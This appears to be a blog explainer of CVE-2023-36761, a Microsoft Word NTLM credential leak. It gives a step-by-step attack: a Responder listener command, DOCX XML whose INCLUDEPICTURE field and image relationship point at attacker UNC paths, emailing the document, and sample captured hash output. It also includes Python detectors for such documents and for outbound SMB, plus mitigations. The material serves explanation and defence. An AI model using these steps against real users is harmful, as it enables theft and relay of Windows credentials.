In September 2023, Microsoft patched a serious security flaw in Microsoft Word. Tracked as CVE-2023-36761, this “Information Disclosure Vulnerability” could allow attackers to steal sensitive Windows credentials just by convincing a user to open a crafted document. Let's break down what happened, how it works, and look at the code snippets involved.

What is CVE-2023-36761?

CVE-2023-36761 is a security bug in Microsoft Word. Attackers could exploit this vulnerability to force Word to send your NTLM hashes (a type of Windows login credential) to an attacker’s server — without any user interaction except opening a document.

This allowed attackers to launch NTLM relay attacks or try to crack your password offline, leading to wider breaches inside companies.

Patched: September 2023 Patch Tuesday

Official Microsoft advisory:  
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36761

How Does the Exploit Work?

Microsoft Word supports field codes and linked content (for example “link to another file”, Quick Parts, or an INCLUDEPICTURE field). If an attacker crafts a Word document with a field or image link that references a network share (a UNC path such as \\server\share), Word attempts to connect to that location, and the Windows client authenticates to it with the opening user's credentials.

Example of a malicious field in a DOCX document

<w:fldSimple w:instr="INCLUDEPICTURE \\\\attacker.com\\fake\\image.jpg">

When this field loads (even in the Preview Pane), Word tries to fetch the picture, and Windows automatically sends the user's NTLM authentication to the remote host.

1. Prepare Your Listener

The attacker sets up a server to capture NTLM hashes. This can be done using Responder or Impacket’s ntlmrelayx.

Responder Example

sudo responder -I eth

2. Create the Malicious Word Document

The attacker needs to add an external image with a UNC path.

Unzip a .docx file, open document.xml, and add

<w:p>
  <w:r>
    <w:pict>
      <v:imagedata r:id="rId999" o:title=""/>
    </w:pict>
  </w:r>
</w:p>

And in document.xml.rels

<Relationship Id="rId999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="\\attacker-ip\share\img.jpg"/>
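Both constructs shown above, a relationship whose Target is a UNC path and an INCLUDEPICTURE field whose argument is a UNC path, sit in plain XML inside the .docx zip and can be spotted before the file is ever rendered. The following scanner is an added example written for this page (it is not code from the original post, from Microsoft, or from any of the referenced projects): it parses the relationship parts and the document parts, flags any relationship target or remote-fetching field code that points at a UNC path or file:// URL, and is exercised against a constructed in-memory set of parts that mirrors the two snippets. The names attacker.example and 192.0.2.10 are placeholders; the mapping-of-parts interface (scan_parts) is an assumption made so the example runs without writing any file.

```python
import re
import sys
import zipfile
from xml.etree import ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# A target that makes Word reach out over SMB: a UNC path (two or more leading
# backslashes, because field codes escape each backslash) or a file:// URL.
REMOTE_PATH_RE = re.compile(r"(?:\\{2,}[\w.-]+|file://)", re.IGNORECASE)

# Field codes that fetch content from their argument when the document renders.
FETCHING_FIELDS = ("INCLUDEPICTURE", "INCLUDETEXT", "HYPERLINK")


def _scan_rels(part, data):
    """Flag relationship targets that point at a UNC path or file:// URL."""
    findings = []
    for rel in ET.fromstring(data).iter(f"{{{REL_NS}}}Relationship"):
        target = rel.get("Target", "")
        if REMOTE_PATH_RE.search(target):
            findings.append({"part": part, "kind": "relationship",
                             "id": rel.get("Id"), "detail": target})
    return findings


def _scan_fields(part, data):
    """Flag simple fields (w:fldSimple) and complex fields (w:instrText runs)
    whose field code fetches from a UNC path or file:// URL."""
    root = ET.fromstring(data)
    codes = [e.get(f"{{{W_NS}}}instr", "") for e in root.iter(f"{{{W_NS}}}fldSimple")]
    # Complex fields spread their code over several w:instrText runs; join them.
    codes.append(" ".join(e.text or "" for e in root.iter(f"{{{W_NS}}}instrText")))
    findings = []
    for code in codes:
        if any(k in code.upper() for k in FETCHING_FIELDS) and REMOTE_PATH_RE.search(code):
            findings.append({"part": part, "kind": "field", "detail": code.strip()})
    return findings


def scan_parts(parts):
    """parts: mapping of zip member name -> bytes for the XML parts of a .docx."""
    findings = []
    for name, data in parts.items():
        if name.endswith(".rels"):
            findings.extend(_scan_rels(name, data))
        elif name.endswith(".xml"):
            findings.extend(_scan_fields(name, data))
    return findings


def scan_docx(path):
    """Open a .docx (a zip archive) and scan its XML parts without rendering it."""
    with zipfile.ZipFile(path) as zf:
        parts = {n: zf.read(n) for n in zf.namelist() if n.endswith((".xml", ".rels"))}
    return scan_parts(parts)


# Constructed sample mirroring the two snippets above; hostnames are placeholders.
SAMPLE_PARTS = {
    "word/document.xml": (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
        ' xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"'
        ' xmlns:v="urn:schemas-microsoft-com:vml"><w:body>'
        '<w:p><w:r><w:pict><v:imagedata r:id="rId999"/></w:pict></w:r></w:p>'
        r'<w:p><w:fldSimple w:instr="INCLUDEPICTURE \\\\attacker.example\\fake\\image.jpg"/></w:p>'
        "</w:body></w:document>"
    ).encode(),
    "word/_rels/document.xml.rels": (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"'
        ' Target="media/image1.png"/>'
        '<Relationship Id="rId999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"'
        r' Target="\\192.0.2.10\share\img.jpg" TargetMode="External"/>'
        "</Relationships>"
    ).encode(),
}

if __name__ == "__main__":
    # Scan a real file if a path is given, otherwise the constructed sample.
    results = scan_docx(sys.argv[1]) if len(sys.argv) > 1 else scan_parts(SAMPLE_PARTS)
    for finding in results:
        print(finding)
```

Run against the sample it reports one relationship finding (rId999) and one field finding; the embedded image relationship with a relative media/ target is ignored. A mail gateway or sandbox can run the same check on attachments, which catches the document regardless of whether the target is a hostname or an IP.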

3. Sending the Trap

Send your crafted Word doc via email, message, etc.

4. Capture the Hash

When the victim opens the doc, their Windows client automatically tries to authenticate to the share, and their NTLM hash appears on the attacker's box:

[SMB] NTLMv2-SSP Client   : 192.168.1.101
[SMB] NTLMv2-SSP Username : VICTIMPC\jane
[SMB] NTLMv2-SSP Hash     : jane::VICTIMPC:...

Now, the attacker can try to crack it offline with a tool like hashcat.

Why is This So Dangerous?

- No macro, no click, no warning. Just opening/previewing the doc is enough.

How Did Microsoft Fix It?

The update stops Word from automatically authenticating to remote UNC paths referenced by a document.

Update your Office right away!  
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36761

Indicators of Compromise

If you spot outbound SMB traffic (TCP 445/139) to unknown IPs or domains, especially right after a user opens a document, your network may be at risk. NTLM relay attacks often show up as failed logons or as connections to unexpected servers.

- Never open unsolicited docs: especially from unknown senders.

- Block outgoing SMB: use firewalls to block SMB/CIFS (TCP ports 445/139) traffic to the internet.
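A concrete version of the "outbound SMB to unknown hosts" indicator above, as an added example that is not part of the original post: it reads firewall log lines in the style of the Windows Firewall pfirewall.log (W3C fields) and reports every outbound TCP 445/139 attempt from an internal host to an address outside the organisation's own ranges. The log lines, the internal ranges and all addresses are constructed; dropped attempts are reported alongside allowed ones, because a connection the firewall blocked still tells you which workstation opened a document that tried to reach out.

```python
import ipaddress

# Address space the (hypothetical) organisation owns; anything else is "unknown".
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SMB_PORTS = {445, 139}

# Constructed sample in pfirewall.log style. 203.0.113.0/24 is a documentation
# range standing in for an attacker-controlled host on the internet.
SAMPLE_LOG = """\
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2023-09-13 10:22:01 ALLOW TCP 192.168.1.101 192.168.1.10 51230 445 0 - 0 0 0 - - - SEND
2023-09-13 10:22:05 ALLOW TCP 192.168.1.101 203.0.113.5 51234 445 0 - 0 0 0 - - - SEND
2023-09-13 10:22:06 DROP TCP 192.168.1.101 203.0.113.5 51235 139 0 - 0 0 0 - - - SEND
2023-09-13 10:22:09 ALLOW TCP 192.168.1.101 203.0.113.5 51236 443 0 - 0 0 0 - - - SEND
2023-09-13 10:22:10 ALLOW TCP 203.0.113.9 192.168.1.101 40000 445 0 - 0 0 0 - - - RECEIVE
"""


def is_internal(ip):
    """True if the address lies inside one of the organisation's own ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line):
    """Return one log record as a dict, or None for header and blank lines."""
    if not line.strip() or line.startswith("#"):
        return None
    f = line.split()
    if len(f) < 9:
        return None
    return {"time": f"{f[0]} {f[1]}", "action": f[2], "proto": f[3],
            "src": f[4], "dst": f[5], "sport": int(f[6]), "dport": int(f[7]),
            "path": f[-1]}


def find_smb_egress(log_text):
    """Outbound TCP 445/139 attempts from an internal host to a non-internal one.
    Both ALLOW and DROP records count: the attempt itself is the indicator."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["proto"] != "TCP" or rec["path"] != "SEND":
            continue
        if rec["dport"] in SMB_PORTS and is_internal(rec["src"]) and not is_internal(rec["dst"]):
            alerts.append(rec)
    return alerts


if __name__ == "__main__":
    for a in find_smb_egress(SAMPLE_LOG):
        print(f'{a["time"]} {a["action"]} {a["src"]} -> {a["dst"]}:{a["dport"]}')
```

On the sample this reports the two attempts to 203.0.113.5 (one allowed on 445, one dropped on 139) and stays quiet about the internal file server, the HTTPS connection and the inbound record. Internal ranges are listed explicitly rather than derived from the address class, because the documentation and carrier-grade NAT ranges that library "private" checks include are exactly the kind of address an egress alert must not ignore.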

References & Original Sources

- Official Microsoft Advisory
- Huntress Labs: Technical Analysis & Detection
- Proof of Concept (POC) on GitHub
- Impacket Toolkit for Relays
- Detection Guidance

In Summary

CVE-2023-36761 is a classic example of old tricks in new places. By simply sticking a remote image reference into a Word doc, attackers could “fish” for your network credentials. The fix is out — so patch up, and stay sharp when opening unexpected documents.

Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC